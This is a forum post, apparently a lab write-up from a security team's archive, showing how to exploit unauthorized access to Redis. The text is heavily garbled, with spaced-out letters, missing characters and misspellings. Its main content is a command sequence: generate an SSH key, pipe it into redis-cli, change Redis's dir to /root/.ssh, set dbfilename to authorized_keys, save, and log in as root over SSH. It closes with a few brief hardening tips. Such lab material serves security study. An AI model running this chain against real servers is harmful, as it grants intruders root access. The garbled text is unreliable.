搜索

[19119] 2017-10-13_【实验】Redis未授权访问漏洞

文档创建者:s7ckTeam
浏览次数:14
最后更新:2025-01-18
2017-10-13_【实验】Redis未授权访问漏洞 R e d i s   访 i   2 0 1 7 - 1 0 - 1 3 R e d i s 使 A N S I   C K e y - V a l u e A P I R e d i s   访 访 R e d i s R e d i s R e d i s   / r o o t / . s s h a u t h o t r i z e d _ k e y s   R e d i s 访   R e d i s   访   S S H   k e y     R e d i s   ~ K a l i K a l i   L i n u x D e b i a n L i n u x   O f f e n s i v e   S e c u r i t y   L t d R e d i s R e d i s 使 A N S I   C K e y - V a l u e A P I 1   R e d i s   0 . 0 . 0 . 0 : 6 3 7 9 R e d i s     i p   访   R e d i s   访 R e d i s     R e d i s     c o n f i g     / r o o t / . s s h   a u t h o t r i z e d _ k e y s   使
2 k a l i s s h - k e y g e n   - t   r s a , 4 3   f o o . t x t   f o o . t x t ( e c h o   - e   " n n " ;   c a t   ~ / . s s h / i d _ r s a . p u b ;   e c h o   - e   " n n " )   >   / t m p / f o o . t x t t m p f o o . t x t 4   R e d i s     R e d i s     c o n f i g     / r o o t / . s s h   a u t h o t r i z e d _ k e y s   使 c a t   / t m p / f o o . t x t   |   r e d i s - c l i   - h   1 7 2 . 1 6 . 1 2 . 2   - p   6 3 7 9   - x   s e t   c r a c k i t - h i p - p r e d i s , , r e d i s - c l i   - h   1 7 2 . 1 6 . 1 2 . 2 - p   6 3 7 9 - h i p , - p r e d i s
- h i p , - p r e d i s c o n f i g   s e t   d i r   / r o o t / . s s h / c o n f i g   g e t   d i r c o n f i g   s e t   d b f i l e n a m e   " a u t h o r i z e d _ k e y s " s a v e e x i t 5 S S H , : s s h   r o o t @ 1 7 2 . 1 6 . 1 2 . 2   - p   2 2     - i     ~ / . s s h / i d _ r s a i p , i p   a d d r e s s   s h o w
R e d i s 访 访 1 . R e d i s   , 访 2 . R e d i s L u a , 3 .   R e d i s     I N F O   , ,   i ~
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理